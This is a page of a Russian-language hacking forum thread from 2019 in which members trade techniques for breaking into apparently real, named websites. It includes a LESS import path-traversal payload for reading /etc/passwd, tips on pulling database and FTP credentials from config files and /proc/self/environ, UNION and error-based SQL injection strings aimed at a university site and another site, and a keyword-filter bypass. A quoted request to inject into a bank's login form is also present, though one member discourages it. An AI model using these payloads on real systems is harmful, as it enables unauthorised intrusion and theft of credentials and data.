ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2541  
Старый 18.02.2019, 07:32
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15
 
Ответить с цитированием

  #2542  
Старый 18.02.2019, 11:46
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

Цитата:
Сообщение от pinch  
↑
нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15
Ну, 6 строк вывода в ошибке это тоже не плохо. Как вариант, попробуй почитать индексный файл и остальные файлы сайта, очень часто в первых строках идут подключения конфигов и прочих библиотек, возможно прочитав конфиг тебе повезет увидеть в первых 6-ти строках данные для подключения к бд, фтп и тд. (Если конечно эти строки не забитый комментариями разработчиков )
 
Ответить с цитированием

  #2543  
Старый 18.02.2019, 12:02
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию

/proc/self/environ если инклуд а не читалка просто. ну или ававатрку залей с кодом если есть возможность
 
Ответить с цитированием

  #2544  
Старый 18.02.2019, 12:19
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 685
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от pinch  
↑
проблема в выводе которая ограничивается 6 строками есть идеи как обойти?
Не нарушать работу парсера. Если есть возможность как-то закинуть свою нагрузку (пример), можно попробовать так:

Код:
/style.less?update=e51qf61z&imports[]=../../../../../../../../../../../tmp/your_cool_file.jpg
Содержимое your_cool_file.jpg:

Код:
@import (inline) "/etc/passwd";
 
Ответить с цитированием

  #2545  
Старый 20.02.2019, 18:13
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

Цитата:
Сообщение от man474019  
↑
Hi friends
Can you help me exploit this sql injection
I tried but no result
Spoiler: sqli link
POST /cabinet HTTP/1.1
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
Referer:
https://ne.birkart.az/
Cookie: PHPSESSID=81d5c3c11f885d5bbe968db124eb5453; uslk_e=ZDQ0NmYyZDAtYzQzZC0yOGQxLTQ1MzItMDRhZWI1YmI 2NzUw~~~~~~~1~; uslk_s=Idle%3B0~~0~0~0~~; __cfduid=d9efd55b42b5016584f8a88876936dbaa15408807 19; __cfduid=d9efd55b42b5016584f8a88876936dbaa15408807 19
Host: ne.birkart.az
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=check&birthday=1
[injection-here]
&cif=1
[injection-here]
Thanks!


have you?

This is really bad idea to run SQLi attack on banking if they didn't ask you to do.
 
Ответить с цитированием

  #2546  
Старый 21.02.2019, 19:38
hibar1Xs
Новичок
Регистрация: 30.01.2019
Сообщений: 15
С нами: 3835766

Репутация: 3
По умолчанию

Не обойти?

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]]);
if(!([/
COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"./"[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{ exit([/COLOR][COLOR="#DD0000"]'FALSE'[/COLOR][COLOR="#007700"]); }[/COLOR][/COLOR] 
----------------------------------

$_GET['f'] = 'wrapper://'

$w = $_GET['f];

Возможна ли работа враппера с конкатенацией: './'.$w ?

readfile('./'.$_GET['f']);
 
Ответить с цитированием

  #2547  
Старый 01.03.2019, 15:40
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от m0nkrus  
↑
http://prntscr.com/mqndc1
помогите раскрутить POST
посещалка
http://prntscr.com/mqndmq
ссылка такая
https://www.сайт/tbdtdb/result.php
Там все элементарно крутится

targetname=uIyg' union all select null,database(),null,null-- eqew&status=---

targetname=uIyg' union all select 1,2,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),4-- eqew&status=---

и так далее
 
Ответить с цитированием

  #2548  
Старый 03.03.2019, 08:05
BenderMR
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами: 3801206

Репутация: 10
По умолчанию

Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?

Код:
http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(select%20database())))--+&Itemid=19&lang=uk
 
Ответить с цитированием

  #2549  
Старый 03.03.2019, 11:00
BillyBons
Участник форума
Регистрация: 01.12.2016
Сообщений: 217
С нами: 4973366

Репутация: 13
По умолчанию

Цитата:
Сообщение от BenderMR  
↑
Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?
Код:
http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(select%20database())))--+&Itemid=19&lang=uk
FRfromOM
 
Ответить с цитированием

  #2550  
Старый 03.03.2019, 18:11
L73898UNIT
Новичок
Регистрация: 09.12.2018
Сообщений: 11
С нами: 3910646

Репутация: 0
По умолчанию

Сорри, если пишу не туда

WPScan указал версию сайта 4.9.8 и вывел следуюющее:

WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution fixed in version 4.9.9

WordPress
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.